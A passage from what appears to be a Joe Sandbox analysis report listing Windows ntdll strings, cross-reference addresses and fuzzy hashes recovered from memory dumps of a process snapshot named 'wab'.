__report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                    • API String ID: 0-108210295
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                    • API String ID: 0-2160512332

                    Control-flow Graph

                    Strings
                    • double initialized or corrupted critical section, xrefs: 213E5508
                    • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 213E54CE
                    • Thread is in a state in which it cannot own a critical section, xrefs: 213E5543
                    • Invalid debug info address of this critical section, xrefs: 213E54B6
                    • undeleted critical section in freed memory, xrefs: 213E542B
                    • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 213E54E2
                    • corrupted critical section, xrefs: 213E54C2
                    • Critical section debug info address, xrefs: 213E541F, 213E552E
                    • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 213E540A, 213E5496, 213E5519
                    • Thread identifier, xrefs: 213E553A
                    • Address of the debug info found in the active list., xrefs: 213E54AE, 213E54FA
                    • Critical section address, xrefs: 213E5425, 213E54BC, 213E5534
                    • 8, xrefs: 213E52E3
                    • Critical section address., xrefs: 213E5502
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
                    • Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                    • API String ID: 0-2368682639

                    Control-flow Graph

                    Strings
                    • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 213E2498
                    • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 213E2409
                    • @, xrefs: 213E259B
                    • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 213E24C0
                    • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 213E2412
                    • RtlpResolveAssemblyStorageMapEntry, xrefs: 213E261F
                    • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 213E2506
                    • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 213E25EB
                    • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 213E2624
                    • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 213E2602
                    • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 213E22E4
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
• Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                    • API String ID: 0-4009184096
                    • Opcode ID: e2e1fdcc3c72f53073068432bae159d54bc100591a0f9e373ef96e434d9f081e
                    • Instruction ID: b4b08e287a96c93176692ee17a07ef7722ca6fb7a1495ffa89e188fc3ed45fec
                    • Opcode Fuzzy Hash: e2e1fdcc3c72f53073068432bae159d54bc100591a0f9e373ef96e434d9f081e
                    • Instruction Fuzzy Hash: DD025DB1D002299FDB21CB54CC84B9AB7BABF55318F5041DAEA0DA7241EB309F84CF59
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
• Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                    • API String ID: 0-2515994595
                    • Opcode ID: c5d14fc36d58c8009d482e2a2724275942c15dd607512adfb1e308109d6b1152
                    • Instruction ID: 2f4ecd56756fc1c86109c3130171669209bf3b13223554294cef1d0affcd2bc1
                    • Opcode Fuzzy Hash: c5d14fc36d58c8009d482e2a2724275942c15dd607512adfb1e308109d6b1152
                    • Instruction Fuzzy Hash: 0C51CDB15053469BD325CF188880BABBBEDEF95354F504A2DE99CC3249F770D609CB92
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
• Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                    • API String ID: 0-3197712848
                    • Opcode ID: 4faa42241a8e2f8262c70f517f526d49c633c0e6039630a155f59b09337f8a8c
                    • Instruction ID: d36b58099397d9faea951c7cc82f2f472ef0cb973c89439192a9b39c295619e5
                    • Opcode Fuzzy Hash: 4faa42241a8e2f8262c70f517f526d49c633c0e6039630a155f59b09337f8a8c
                    • Instruction Fuzzy Hash: 4B1209B26093469FD321CF18C840BAAB7E6FF8570CF05096DF9899B291E734D945CB92
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
• Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI$\U4!$\U4!
                    • API String ID: 0-1197931908
                    • Opcode ID: 2c1bc8b75cad7a1c2494f6d54bf479a6120371e4e83943972db369325f263ce8
                    • Instruction ID: 7066968fdab1edcd80753aaeae985d062af64c101a880f2bd68ea7f824d82c85
                    • Opcode Fuzzy Hash: 2c1bc8b75cad7a1c2494f6d54bf479a6120371e4e83943972db369325f263ce8
                    • Instruction Fuzzy Hash: 5432827290426DCBEB22CB14CC94BDEB7BAAF45348F1441E9D849A7255D7399F82CF40
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
• Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                    • API String ID: 0-1700792311
                    • Opcode ID: 3b21c489aacf288a09858b0cec63c76cba0cf8a9e0d3afb3663c4aba8926abd3
                    • Instruction ID: f010fd213b2b560390fe9fa46881d80455b3643b68d5b3a0698f23cb398ed6f5
                    • Opcode Fuzzy Hash: 3b21c489aacf288a09858b0cec63c76cba0cf8a9e0d3afb3663c4aba8926abd3
                    • Instruction Fuzzy Hash: 0CD1C031900A85DFDB12CF68C444AAEBBF6FF5A718F048059E44D9B76AC739A981CB14
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
• Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T$`V4!${
                    • API String ID: 0-1611330655
                    • Opcode ID: 79ed9cdbdf165091aaf3c6a7502fb70df24c9d66f74ee0ccf0701d4ebd9c4df7
                    • Instruction ID: 176d4bd3ac551178406314e7bf212f8ea6136765d91e99c76eae75b2eb4032c8
                    • Opcode Fuzzy Hash: 79ed9cdbdf165091aaf3c6a7502fb70df24c9d66f74ee0ccf0701d4ebd9c4df7
                    • Instruction Fuzzy Hash: E2A24D76A05629CFDB68CF18C898B99BBBABF45318F1042E9D51DA7650DB349EC1CF00
                    Strings
                    • VerifierFlags, xrefs: 213F8C50
                    • VerifierDebug, xrefs: 213F8CA5
                    • HandleTraces, xrefs: 213F8C8F
                    • AVRF: -*- final list of providers -*- , xrefs: 213F8B8F
                    • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 213F8A67
                    • VerifierDlls, xrefs: 213F8CBD
                    • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 213F8A3D
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
• Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                    • API String ID: 0-3223716464
                    • Opcode ID: 00d80a2bf4c24cd139ec95bfa77a0219e3dc4b24a9067b99298004efb6c89438
                    • Instruction ID: 38d53f037220cad865fbf67b3c2fda937aec53ca614857fe1c50e9d0dc4dc090
                    • Opcode Fuzzy Hash: 00d80a2bf4c24cd139ec95bfa77a0219e3dc4b24a9067b99298004efb6c89438
                    • Instruction Fuzzy Hash: 38911572545786AFD719CF28C880F4A7BEAEF5579CF1104A8FA48AF260D7349C04CB95
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
• Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                    • API String ID: 0-792281065
                    • Opcode ID: 548461071201f3d14be2767fa1caf03a333d9e99594cfb1a037a87620a86eaff
                    • Instruction ID: 9f2d4b221e48aeaad5fc80390dd9e69a486925533af1145b02976b69b412b54b
                    • Opcode Fuzzy Hash: 548461071201f3d14be2767fa1caf03a333d9e99594cfb1a037a87620a86eaff
                    • Instruction Fuzzy Hash: BF91F3B0A003A5DFEB15CF54C888B9A7BA7EF59B6CF104129E518BB391DB789801C7D1
                    Strings
                    • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 213E219F
                    • SXS: %s() passed the empty activation context, xrefs: 213E2165
                    • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 213E2178
                    • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 213E2180
                    • RtlGetAssemblyStorageRoot, xrefs: 213E2160, 213E219A, 213E21BA
                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 213E21BF
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
• Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                    • API String ID: 0-861424205
                    • Opcode ID: f9749818f1d48bf2246cc57c5e559549bf90261d3b1e9b9d0e723fba48ae58ba
                    • Instruction ID: 588ba1a43d4980c938188ef09430865ae4d9263fc070e0bc4e6dc43bc0d29eff
                    • Opcode Fuzzy Hash: f9749818f1d48bf2246cc57c5e559549bf90261d3b1e9b9d0e723fba48ae58ba
                    • Instruction Fuzzy Hash: A631B43AA00225BAE7218E958C85F5A7F7FFF55A58F114059FA08A7245D230DB0087A1
                    Strings
                    • minkernel\ntdll\ldrredirect.c, xrefs: 213E8181, 213E81F5
                    • minkernel\ntdll\ldrinit.c, xrefs: 213AC6C3
                    • Unable to build import redirection Table, Status = 0x%x, xrefs: 213E81E5
                    • LdrpInitializeImportRedirection, xrefs: 213E8177, 213E81EB
                    • Loading import redirection DLL: '%wZ', xrefs: 213E8170
                    • LdrpInitializeProcess, xrefs: 213AC6C4
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
• Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                    • API String ID: 0-475462383
                    • Opcode ID: 513d7ccc4076f1794837c02b67939466050a254305c31ccbc0d3a69a74850d24
                    • Instruction ID: 43496ab64b74bd7dc5f47626326a56ac6bbe7da8b62854e32e602a5d30552758
                    • Opcode Fuzzy Hash: 513d7ccc4076f1794837c02b67939466050a254305c31ccbc0d3a69a74850d24
                    • Instruction Fuzzy Hash: 8A31F5B1644756AFD310DF28C985E1B77D6EF95B2CF000568F9486B3A1E634ED04C7A2
                    APIs
                      • Part of subcall function 213B2DF0: LdrInitializeThunk.NTDLL ref: 213B2DFA
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 213B0BA3
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 213B0BB6
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 213B0D60
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 213B0D74
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
• Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                    • String ID:
                    • API String ID: 1404860816-0
                    • Opcode ID: 527da5d2e04264a36a0bdb6a1e267059e735d45114ee09690ca9016a16a431a6
                    • Instruction ID: aa21fd6271093d51f4198bd9ab28b0be70574a37d62777b0fa2e0d387b6d1493
                    • Opcode Fuzzy Hash: 527da5d2e04264a36a0bdb6a1e267059e735d45114ee09690ca9016a16a431a6
                    • Instruction Fuzzy Hash: D2426D71900719DFDB21CF28C880B9AB7FABF05308F1445A9E99DDB641E770AA84CF61
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
• Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                    • API String ID: 0-379654539
                    • Opcode ID: 1357aec3bc51e38d26fec23784f6ac614ff2e24914268a861d493a25c0addb9f
                    • Instruction ID: 48aeb7fca32ab30b213f59a9138be79069fef7bdcfb1d4b60ebef06a436a1829
                    • Opcode Fuzzy Hash: 1357aec3bc51e38d26fec23784f6ac614ff2e24914268a861d493a25c0addb9f
                    • Instruction Fuzzy Hash: CBC18972108386CFD701CF58C840B5AB7FABF85718F04496EF9959B250E739CA4ACB52
                    Strings
                    • minkernel\ntdll\ldrinit.c, xrefs: 213A8421
                    • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 213A855E
                    • LdrpInitializeProcess, xrefs: 213A8422
                    • @, xrefs: 213A8591
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
• Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                    • API String ID: 0-1918872054
                    • Opcode ID: e76a2e5ccb48af98517f59ef46070d96cd81e46f1e6ecb102fa1e331a16bb5a0
                    • Instruction ID: 3220a435d7f4e52509c962c7d9938ce2d08e2efd96d78d54499dc3a7226ea64f
                    • Opcode Fuzzy Hash: e76a2e5ccb48af98517f59ef46070d96cd81e46f1e6ecb102fa1e331a16bb5a0
                    • Instruction Fuzzy Hash: 1C917D71508345AFD721DF25CC44EABBAEEFF9474CF40096DFA8896151E734DA048BA2
                    Strings
                    • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 213E21D9, 213E22B1
                    • .Local, xrefs: 213A28D8
                    • SXS: %s() passed the empty activation context, xrefs: 213E21DE
                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 213E22B6
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
• Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                    • API String ID: 0-1239276146
                    • Opcode ID: 2a9f9f58c4018b00157f69c321ea9f43844f8552e99dd326c9dd6896383cf946
                    • Instruction ID: 07fcc78dc4a75019e0f57f016c089921272966e2c417303cc371f61eab1cde63
                    • Opcode Fuzzy Hash: 2a9f9f58c4018b00157f69c321ea9f43844f8552e99dd326c9dd6896383cf946
                    • Instruction Fuzzy Hash: 6EA18D359012299FDB25CF64C888B99B7BAFF59758F2141EDE908AB351D7309E80CF90
                    Strings
                    • RtlDeactivateActivationContext, xrefs: 213E3425, 213E3432, 213E3451
                    • SXS: %s() called with invalid flags 0x%08lx, xrefs: 213E342A
                    • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 213E3456
                    • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 213E3437
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
• Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                    • API String ID: 0-1245972979
                    • Opcode ID: 7e5512cc5fbe3245188add9d1b0589a2e7c21ed1f57e6161fd5ec33e48ea05fd
                    • Instruction ID: d0b19bedd2893e1152abfe66ba89a563316b764378a73b1bf71837bfe5fed2a6
                    • Opcode Fuzzy Hash: 7e5512cc5fbe3245188add9d1b0589a2e7c21ed1f57e6161fd5ec33e48ea05fd
                    • Instruction Fuzzy Hash: 10612536600712AFD7128F18C885F1AB7EBEF91B68F14851DEC59AB340D734E901CB91
                    Strings
                    • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 213D0FE5
                    • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 213D1028
                    • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 213D106B
                    • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 213D10AE
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
• Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2818730058.00000000214DE000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21340000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                    • API String ID: 0-1468400865
                    • Opcode ID: 4c3fb070b6206d6586f173108d38e7000b847186fe1e97da3b67b6a000fc627a
                    • Instruction ID: 45d9cad249b877d7c3003f09a09f0dd675ba19f361a9622490cde99925cb5a8f
                    • Opcode Fuzzy Hash: 4c3fb070b6206d6586f173108d38e7000b847186fe1e97da3b67b6a000fc627a
                    • Instruction Fuzzy Hash: 4571BFB2904345AFDB11DF18C884F8B7FAEAF55768F000469F9488B246D738D689DBD2
                    Strings
                    • minkernel\ntdll\ldrsnap.c, xrefs: 213E3640, 213E366C
                    • LdrpFindDllActivationContext, xrefs: 213E3636, 213E3662
                    • Querying the active activation context failed with status 0x%08lx, xrefs: 213E365C
                    • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 213E362F
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2818730058.0000000021340000.00000040.00001000.00020000.00000000.sdmp, Offset: 21340000, based on PE: true
• Associated: 0000000A.00000002.2818730058.0000000021469000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2818730058.000000002146D000.00000040.00001000.00020000.00000000.sdmp
